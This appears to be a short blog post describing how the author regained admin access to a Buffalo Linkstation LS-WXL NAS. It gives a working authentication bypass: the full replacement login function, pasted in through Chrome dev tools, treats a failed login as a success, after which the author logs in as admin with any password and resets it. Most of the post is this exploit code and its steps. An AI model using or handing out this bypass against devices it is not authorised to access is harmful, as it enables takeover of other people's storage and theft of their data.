Buffalo Linkstation (LS-WXL) – Admin hack

Long story short I needed access to this NAS and it was on the other side of the planet so a little creative coding came to the rescue.

With developer tools enabled (I used Chrome).

  • Get to the login page
  • Open dev tools sources tab
  • Open login_utis.js under the ‘authentication’ folder
  • Replace the login function with the following:

function login(f, lang) {
if (login_lock != 0) {
return;
}
login_lock = 1;

var uid = Ext.getCmp(‘user’);
var uid_value = uid.getValue();
var pwd = Ext.getCmp(‘password’);
var pwd_value = pwd.getValue();

f.form.submit({
url: ‘/dynamic.pl’,
params: {
bufaction: ‘verifyLogin’
},
waitTitle: S(‘Please Wait…’),
waitMsg: S(‘Logging In…’),
success: function(form, action){
var decodedResponse= Ext.decode(action.response.responseText);
var jsonData = decodedResponse.data;
loginSuccess(f, action, uid_value, lang);
},
failure: function(form, action){
loginSuccess(f, action, uid_value, lang);
}
});
};

  • Hit Ctrl+S (save the change)
  • Login as admin with any password. I used admin/admin
  • Reset the admin account with a new password.

Bad security in this case saved a lot of hassle.